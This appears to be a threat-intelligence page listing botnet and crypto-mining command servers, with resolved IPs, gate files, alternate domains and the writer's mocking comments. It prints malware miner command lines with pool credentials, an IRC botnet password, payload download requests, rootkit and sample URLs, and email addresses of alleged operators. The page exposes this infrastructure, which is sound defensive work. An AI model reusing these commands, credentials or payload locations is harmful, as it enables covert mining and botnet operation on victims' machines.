Resolved www.welovegiveaways.net to 199.229.235.250 Server: www.welovegiveaways.net Gate file: /justricewithwater/image.php Plugins: Rootkit: hxxp://www.welovegiveaways.net/justricewithwater/r.pack Bitcoin mining info: Shell.exe” -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1 -p none -t 0 -I 10macromedia.exe” -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1 -p none -g no Hosting infos: http://whois.domaintools.com/199.229.235.250
x.e1b2.org (ngrBot irc botnet hosted by namecheap.com)
Resolved x.e1b2.org to 192.64.114.16, 192.64.114.184 Server: x.e1b2.org Port: 80 Server password: 666666 Channel: ##Rox-x01## Topic for ##Rox-x01## is: !m on !s -n !mod usbi on !NAZEL hxxp://www8.0zz0.com/2013/05/25/23/865519528.gif !NAZEL hxxp://www12.0zz0.com/2013/05/24/15/675195622.gif !NAZEL hxxp://www12.0zz0.com/2013/05/21/06/487587018.gif Topic for ##Rox-x01## set by xXx at Mon May 27 14:47:02 2013 The server requires SSL to connect Alternate domains: x.e2b3.org x.c1d2.org x.x1ua.org x.x1x2.suRead more...
www.vbvx.com (Betabot http botnet hosted by ovh.net)
Resolved www.vbvx.com to 94.23.56.186 Server: www.vbvx.com Gate file: /remote/order.php Bitcoin mining info: Shell.exe” -o http://vbvx.com:8344 -u shubhank008_work -p plawasthi -t 0 -I 10 macromedia.exe” -o http://vbvx.com:8344 -u shubhank008_work -p plawasthi -g no -t 2 Looks like he’s running a mining proxy on his vps. Hosting infos: http://whois.domaintools.com/94.23.56.186 Related md5s (search on malwr.com to download theRead more...
privatesmartscreen.nl(Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS Queries: privatesmartscreen.nl DNS_TYPE_A 159.253.0.151 HTTP Conversations: 159.253.0.151:80 – [privatesmartscreen.nl] Request: GET /Bitcoin/host.txt 149.210.128.55:80 – [149.210.128.55] Request: GET /bitconi/winlogon32.exe Request: GET /bitconi/winlogon64.exe Request: GET /bitconi/usft_ext.dll Request: GET /bitconi/miner.dll Request: GET /bitconi/coinutil.dll Request: GET /ptx.exe Request: GET /bitconi/btc.exe Request: GET /bitconi/phatk.exe Dutch hecker here: winlogon32.exe” -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321 Samples:Read more...
pool.50btc.com(Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)
Resolved : [pool.50btc.com] To [144.76.52.43] HTTP Requests: hxxp://pool.50btc.com:8332/ DATA: POST / HTTP/1.1Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==Content-Length: 128X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchtoUser-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3) Host: pool.50btc.com:8332Cache-Control: no-cache {“method”: “getblocktemplate”, “params”: [{“capabilities”: [“coinbasetxn”, “workid”, “coinbase/append”, “longpollid”]}], “id”:0} Here the hecker: lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332 Sample:hxxp://158.255.2.104/cucaz.exe hosting infos: http://whois.domaintools.com/144.76.52.43
guard4you.info (Betabot http botnet hosted by ecatel.net)
Resolved guard4you.info to 80.82.66.26 Server: guard4you.info Gate file: /customer/order.php Alternate domains: nexusguardian.info vote4us.info meet2n8.info This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably allRead more...
betabros.in (Several http botnets hosted by hostkey.ru)
Resolved betabros.in to 146.0.78.4 Server: betabros.in Gate file: /beta/order.php The owner should keep a closer eye on the fake forum he setup for cover. 1071 pages of pharmacy spam and counting. Hosting infos: http://whois.domaintools.com/146.0.78.4 EDIT: Bitcoin and litecoin mining. macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p xRead more...
jkdef8.ws (Betabot http botnet hosted by ecatel.net)
Resolved jkdef8.ws to 94.102.51.117 Server: jkdef8.ws Gate file: /papka/order.php Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws Bitcoin mining info: http://pooledbits.com:8337 -u nigfinity.1 -p x Hosting infos: http://whois.domaintools.com/94.102.51.117
msn.3utilities.com (Betabot http botnet hosted by ecatel.net)
Resolved msn.3utilities.com to 80.82.66.43 Server: msn.3utilities.com Port: 81 Gate file: /help/order.php Alternate domains: videoparadise.biz kittybook.biz msn1981.3utilities.com dates4you.tk Three out of the five domains are free and easy to get suspended. Pro botherder here. Bitcoin mining info: stratum+tcp://eu-stratum.btcguild.com:3333 -u m4tr1x_neo -p 123 -t 0 -I -3 Litecoin mining info: -a scrypt -o http://kittybook.no-ip.biz:8332 -u m4tr1x_0Read more...
btcguild.com(Bitcoin Miner botnet hosted in United States Dallas Ebl Global Networks Inc.)
URL: hxxp://btcguild.com:8332/ hxxp://btcguild.com:8332 -u chakan_1 -p 123 hxxp://btcguild.com:8332 -u graskla_1 -p 123 DATA: POST / HTTP/1.1 Authorization: Basic Y2hha2FuXzE6MTIz Content-Length: 43 User-Agent: Ufasoft bitcoin-miner/0.20 (Windows NT XP 5.1.2600 Service Pack 3) Host: btcguild.com:8332 Cache-Control: no-cache {“method”: “getwork”, “params”: [], “id”:0} Actions Detected: Creates autorun records Injects code into other processes Patches system files Samples:Read more...